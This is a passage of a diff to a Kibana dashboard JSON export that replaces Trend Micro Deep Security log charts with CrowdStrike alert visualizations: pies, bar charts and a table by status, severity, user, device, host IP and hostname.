-88,7 +104,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "c04767a1-9e74-4057-a95a-0d1ccb016a67", "type": "column" }, "orderDirection": "desc", @@ -96,29 +112,22 @@ "parentFormat": { "id": "terms" }, - "size": 10 + "secondaryFields": [], + "size": 5 }, "scale": "ordinal", - "sourceField": "trendmicro.event.category" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "crowdstrike.alert.status" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } @@ -130,74 +139,58 @@ "query": "" }, "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, "layers": [ { - "accessors": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "categoryDisplay": "default", + "layerId": "836a096e-11de-4f16-8dc1-08de3e3a2b2f", "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f" + "legendDisplay": "show", + "metrics": [ + "c04767a1-9e74-4057-a95a-0d1ccb016a67" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "e1dfcfae-1d38-4434-b22c-847e1a2ef8d7" + ], + "truncateLegend": false } ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" + "shape": "pie" } }, "title": "", "type": "lens", - "visualizationType": "lnsXY" + "visualizationType": "lnsPie" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { - "h": 15, - "i": "afb76ed5-df93-4649-a1d8-ee7586c483dd", - "w": 24, - "x": 0, + "h": 16, + "i": "cf48b7df-a51b-4a21-a2f9-c4c05705b5eb", + "w": 17, + "x": 16, "y": 0 }, - "panelIndex": "afb76ed5-df93-4649-a1d8-ee7586c483dd", - "title": "Deep Security Logs Count by Trend Micro Top 10 Event Category", + "panelIndex": "cf48b7df-a51b-4a21-a2f9-c4c05705b5eb", + "title": "Alert by Status [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-b4403946-8fa4-464f-b1e2-17fae6304bb5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5c9cfcd1-2c7f-493f-86a5-002bcf501fde", "type": "index-pattern" } ], @@ -206,17 +199,17 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "b4403946-8fa4-464f-b1e2-17fae6304bb5": { "columnOrder": [ - "10d0f1f2-7bbc-413f-acd0-a00bac68f06f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "8ad4264b-af2b-48aa-91a8-e4be5782a1c2", + "8e708f78-e313-4f7c-98dd-625bdc4ef202" ], "columns": { - "10d0f1f2-7bbc-413f-acd0-a00bac68f06f": { + "8ad4264b-af2b-48aa-91a8-e4be5782a1c2": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Trend Micro Event Category", + "label": "Host OS Platform", "operationType": "terms", "params": { "exclude": [], @@ -225,7 +218,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "8e708f78-e313-4f7c-98dd-625bdc4ef202", "type": "column" }, "orderDirection": "desc", @@ -234,34 +227,61 @@ "id": "terms" }, "secondaryFields": [], - "size": 10 + "size": 5 }, "scale": "ordinal", - "sourceField": "trendmicro.event.category" + "sourceField": "host.os.platform" }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { + "8e708f78-e313-4f7c-98dd-625bdc4ef202": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5c9cfcd1-2c7f-493f-86a5-002bcf501fde", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -271,20 +291,21 @@ "layers": [ { "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "layerId": "b4403946-8fa4-464f-b1e2-17fae6304bb5", "layerType": "data", - "legendDisplay": "default", + "legendDisplay": "show", "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "8e708f78-e313-4f7c-98dd-625bdc4ef202" ], "nestedLegend": false, "numberDisplay": "percent", "primaryGroups": [ - "10d0f1f2-7bbc-413f-acd0-a00bac68f06f" - ] + "8ad4264b-af2b-48aa-91a8-e4be5782a1c2" + ], + "truncateLegend": false } ], - "shape": "donut" + "shape": "pie" } }, "title": "", @@ -295,24 +316,30 @@ "hidePanelTitles": false }, "gridData": { - "h": 15, - "i": "813d3531-d392-4310-a30e-255453a47462", - "w": 24, - "x": 24, + "h": 16, + "i": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc", + "w": 15, + "x": 33, "y": 0 }, - "panelIndex": "813d3531-d392-4310-a30e-255453a47462", - "title": "Deep Security Logs % by Trend Micro Top 10 Event Category", + "panelIndex": "57bd2cd7-7ec5-41ae-9133-a1ec722479dc", + "title": "Alert by OS Platform [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-986a7419-3b29-4812-8f1e-8648d18ce08b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db8d1eab-6c1e-4d8a-9efa-1f7407fc28bf", "type": "index-pattern" } ], @@ -321,17 +348,30 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "986a7419-3b29-4812-8f1e-8648d18ce08b": { "columnOrder": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "950aa189-023a-4c68-ad46-fba8eaa6dc79", + "d59a23d4-24d0-486d-8d0d-6100463dbb0c", + "029c6079-1dc5-4444-a33a-c4590403af92" ], "columns": { - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f": { + "029c6079-1dc5-4444-a33a-c4590403af92": { "customLabel": true, "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "950aa189-023a-4c68-ad46-fba8eaa6dc79": { + "customLabel": true, + "dataType": "string", "isBucketed": true, - "label": "Trend Micro Signature ID", + "label": "User ID", "operationType": "terms", "params": { "exclude": [], @@ -340,11 +380,11 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, @@ -352,124 +392,13 @@ "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.signature_id" + "sourceField": "user.id" }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f" - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "5f13ec5c-aee1-4dde-92df-8cbe0ecaa7e2", - "w": 24, - "x": 0, - "y": 15 - }, - "panelIndex": "5f13ec5c-aee1-4dde-92df-8cbe0ecaa7e2", - "title": "Deep Security Logs Count by Trend Micro Top 10 Signature ID", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { - "columnOrder": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "columns": { - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f": { + "d59a23d4-24d0-486d-8d0d-6100463dbb0c": { "customLabel": true, - "dataType": "number", + "dataType": "string", "isBucketed": true, - "label": "Trend Micro Signature ID", + "label": "User Name", "operationType": "terms", "params": { "exclude": [], @@ -478,94 +407,113 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, - "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.signature_id" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "% of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "user.name" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "db8d1eab-6c1e-4d8a-9efa-1f7407fc28bf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", "query": "" }, "visualization": { - "layers": [ + "columns": [ { - "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" - ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f" - ] + "columnId": "950aa189-023a-4c68-ad46-fba8eaa6dc79", + "isTransposed": false + }, + { + "columnId": "029c6079-1dc5-4444-a33a-c4590403af92", + "isTransposed": false + }, + { + "columnId": "d59a23d4-24d0-486d-8d0d-6100463dbb0c", + "isTransposed": false } ], - "shape": "donut" + "layerId": "986a7419-3b29-4812-8f1e-8648d18ce08b", + "layerType": "data" } }, "title": "", "type": "lens", - "visualizationType": "lnsPie" + "visualizationType": "lnsDatatable" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { "h": 15, - "i": "f2a5a219-78b4-4901-b93b-aefe163b43c6", + "i": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8", "w": 24, - "x": 24, - "y": 15 + "x": 0, + "y": 16 }, - "panelIndex": "f2a5a219-78b4-4901-b93b-aefe163b43c6", - "title": "Deep Security Logs % by Trend Micro Top 10 Signature ID", + "panelIndex": "65de46f1-ebf9-4c15-8306-f3bc3390b1b8", + "title": "User with Highest Alert [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "82644959-ef2b-4640-a0ca-d45036d96764", "type": "index-pattern" } ], @@ -574,17 +522,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1": { "columnOrder": [ - "9825dc26-0dc2-49b8-a2db-334e9fec92d4", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "fe77febc-cfff-4f08-8c45-2d88cce7d7e8", + "1b066652-7743-4ca9-aea2-579f2a9ddd34" ], "columns": { - "9825dc26-0dc2-49b8-a2db-334e9fec92d4": { + "1b066652-7743-4ca9-aea2-579f2a9ddd34": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "fe77febc-cfff-4f08-8c45-2d88cce7d7e8": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Event Type", + "label": "Device ID", "operationType": "terms", "params": { "exclude": [], @@ -593,7 +553,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "1b066652-7743-4ca9-aea2-579f2a9ddd34", "type": "column" }, "orderDirection": "desc", @@ -604,31 +564,46 @@ "size": 10 }, "scale": "ordinal", - "sourceField": "event.type" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "device.id" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "82644959-ef2b-4640-a0ca-d45036d96764", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -654,19 +629,19 @@ "layers": [ { "accessors": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "1b066652-7743-4ca9-aea2-579f2a9ddd34" ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "layerId": "6e0f7ac1-eb8d-4a86-be2b-9d2f9d1a2dc1", "layerType": "data", - "position": "top", "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "9825dc26-0dc2-49b8-a2db-334e9fec92d4" + "xAccessor": "fe77febc-cfff-4f08-8c45-2d88cce7d7e8" } ], "legend": { "isVisible": true, - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "tickLabelsVisibilitySettings": { @@ -686,23 +661,29 @@ }, "gridData": { "h": 15, - "i": "624b72c2-28f7-4245-89ad-c05025be1614", + "i": "aaa3ce74-8cbd-4e77-837e-cdbd42494339", "w": 24, - "x": 0, - "y": 45 + "x": 24, + "y": 16 }, - "panelIndex": "624b72c2-28f7-4245-89ad-c05025be1614", - "title": "Deep Security Logs Count by Top 10 Event Type", + "panelIndex": "aaa3ce74-8cbd-4e77-837e-cdbd42494339", + "title": "Alert over Device [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-3a2c2235-1a9e-4db6-ac43-2f05c6775021", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9040575b-9449-4f08-98ae-116d26ebf28d", "type": "index-pattern" } ], @@ -711,17 +692,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "3a2c2235-1a9e-4db6-ac43-2f05c6775021": { "columnOrder": [ - "2452aa0a-d551-493b-b053-13846361167e", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "3adbc15a-2906-40ff-9ea6-9eef981ea411", + "342509c6-75f8-409a-81eb-7d0cd1f6af5b" ], "columns": { - "2452aa0a-d551-493b-b053-13846361167e": { + "342509c6-75f8-409a-81eb-7d0cd1f6af5b": { "customLabel": true, - "dataType": "string", + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3adbc15a-2906-40ff-9ea6-9eef981ea411": { + "customLabel": true, + "dataType": "number", "isBucketed": true, - "label": "Trend Micro Event Name", + "label": "Event Severity", "operationType": "terms", "params": { "exclude": [], @@ -730,7 +723,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "342509c6-75f8-409a-81eb-7d0cd1f6af5b", "type": "column" }, "orderDirection": "desc", @@ -738,34 +731,49 @@ "parentFormat": { "id": "terms" }, - "size": 10 + "size": 5 }, "scale": "ordinal", - "sourceField": "trendmicro.event.name" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "% of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "event.severity" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9040575b-9449-4f08-98ae-116d26ebf28d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -775,20 +783,21 @@ "layers": [ { "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", + "layerId": "3a2c2235-1a9e-4db6-ac43-2f05c6775021", "layerType": "data", - "legendDisplay": "default", + "legendDisplay": "show", "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "342509c6-75f8-409a-81eb-7d0cd1f6af5b" ], "nestedLegend": false, "numberDisplay": "percent", "primaryGroups": [ - "2452aa0a-d551-493b-b053-13846361167e" - ] + "3adbc15a-2906-40ff-9ea6-9eef981ea411" + ], + "truncateLegend": false } ], - "shape": "donut" + "shape": "pie" } }, "title": "", @@ -800,23 +809,29 @@ }, "gridData": { "h": 15, - "i": "d5723b06-eb47-4af3-8d87-c70575293831", + "i": "14405add-afa0-4e3f-9efd-1f52fad51027", "w": 24, - "x": 24, - "y": 30 + "x": 0, + "y": 31 }, - "panelIndex": "d5723b06-eb47-4af3-8d87-c70575293831", - "title": "Deep Security Logs % by Trend Micro Top 10 Event Name", + "panelIndex": "14405add-afa0-4e3f-9efd-1f52fad51027", + "title": "Alert by Severity [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-a6424e3b-fc6e-460e-8385-5a410a690d34", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f2f6ede-7728-4214-a79c-27931101ec10", "type": "index-pattern" } ], @@ -825,17 +840,17 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "a6424e3b-fc6e-460e-8385-5a410a690d34": { "columnOrder": [ - "2452aa0a-d551-493b-b053-13846361167e", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "1aa38945-d8a3-4137-b91d-ca2b6f9b140a", + "40dcaef5-e4f3-47e9-8e51-748b882f17e1" ], "columns": { - "2452aa0a-d551-493b-b053-13846361167e": { + "1aa38945-d8a3-4137-b91d-ca2b6f9b140a": { "customLabel": true, - "dataType": "string", + "dataType": "ip", "isBucketed": true, - "label": "Trend Micro Event Name", + "label": "Host IP", "operationType": "terms", "params": { "exclude": [], @@ -844,7 +859,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "40dcaef5-e4f3-47e9-8e51-748b882f17e1", "type": "column" }, "orderDirection": "desc", @@ -855,75 +870,120 @@ "size": 10 }, "scale": "ordinal", - "sourceField": "trendmicro.event.name" + "sourceField": "host.ip" }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { + "40dcaef5-e4f3-47e9-8e51-748b882f17e1": { "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Count of logs", + "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "7f2f6ede-7728-4214-a79c-27931101ec10", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", "query": "" }, "visualization": { - "columns": [ - { - "columnId": "2452aa0a-d551-493b-b053-13846361167e" - }, + "layers": [ { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "accessors": [ + "40dcaef5-e4f3-47e9-8e51-748b882f17e1" + ], + "layerId": "a6424e3b-fc6e-460e-8385-5a410a690d34", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "1aa38945-d8a3-4137-b91d-ca2b6f9b140a" } ], - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data" + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" } }, "title": "", "type": "lens", - "visualizationType": "lnsDatatable" + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { "h": 15, - "i": "8609ed1c-8415-4912-8ff7-75ca89c9afbc", + "i": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4", "w": 24, - "x": 0, - "y": 30 + "x": 24, + "y": 31 }, - "panelIndex": "8609ed1c-8415-4912-8ff7-75ca89c9afbc", - "title": "Deep Security Logs % by Trend Micro Top 10 Event Name (copy)", + "panelIndex": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4", + "title": "Alert over Host IP [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-e83ee069-a761-49ed-878d-c9972e55a388", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9a07642d-eec9-4213-b1ae-bb5adbbcf25c", "type": "index-pattern" } ], @@ -932,17 +992,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "e83ee069-a761-49ed-878d-c9972e55a388": { "columnOrder": [ - "9825dc26-0dc2-49b8-a2db-334e9fec92d4", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "910bf38d-80f2-4783-9e71-d8bb53f06700", + "0465e312-67ef-4386-941e-55db68a8b075" ], "columns": { - "9825dc26-0dc2-49b8-a2db-334e9fec92d4": { + "0465e312-67ef-4386-941e-55db68a8b075": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "910bf38d-80f2-4783-9e71-d8bb53f06700": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Event Type", + "label": "Hostname", "operationType": "terms", "params": { "exclude": [], @@ -951,7 +1023,7 @@ "includeIsRegex": false, "missingBucket": false, "orderBy": { - "columnId": "a9ca7ee9-fe03-483e-bea1-b8e2462609c6", + "columnId": "0465e312-67ef-4386-941e-55db68a8b075", "type": "column" }, "orderDirection": "desc", @@ -959,34 +1031,50 @@ "parentFormat": { "id": "terms" }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "event.type" - }, - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count of logs", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" + "sourceField": "host.hostname" } }, + "ignoreGlobalFilters": false, "incompleteColumns": {}, "sampling": 1 } } }, + "indexpattern": { + "layers": {} + }, "textBased": { "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9a07642d-eec9-4213-b1ae-bb5adbbcf25c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.alert" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.alert" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", @@ -995,49 +1083,58 @@ "visualization": { "layers": [ { - "categoryDisplay": "default", - "layerId": "c548b323-aad7-4518-b361-b6d2300d784a", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "accessors": [ + "0465e312-67ef-4386-941e-55db68a8b075" ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "9825dc26-0dc2-49b8-a2db-334e9fec92d4" - ] + "layerId": "e83ee069-a761-49ed-878d-c9972e55a388", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "910bf38d-80f2-4783-9e71-d8bb53f06700" } ], - "shape": "donut" + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" } }, "title": "", "type": "lens", - "visualizationType": "lnsPie" + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false }, "gridData": { "h": 15, - "i": "6849145b-2219-4b62-a2c1-f6293bf5b6b7", + "i": "69f87d85-d0f2-4fb3-9e02-e970098547db", "w": 24, - "x": 24, - "y": 45 + "x": 0, + "y": 46 }, - "panelIndex": "6849145b-2219-4b62-a2c1-f6293bf5b6b7", - "title": "Deep Security Logs % by Top 10 Event Type", + "panelIndex": "69f87d85-d0f2-4fb3-9e02-e970098547db", + "title": "Alert over Hostname [Logs CrowdStrike]", "type": "lens", - "version": "8.6.0" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "indexpattern-datasource-layer-4e7a254a-d432-4988-a5cb-3de38f841cc9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d887537f-f1fd-404b-8327-8bf3b0d1fdfe", "type": "index-pattern" } ], @@ -1046,29 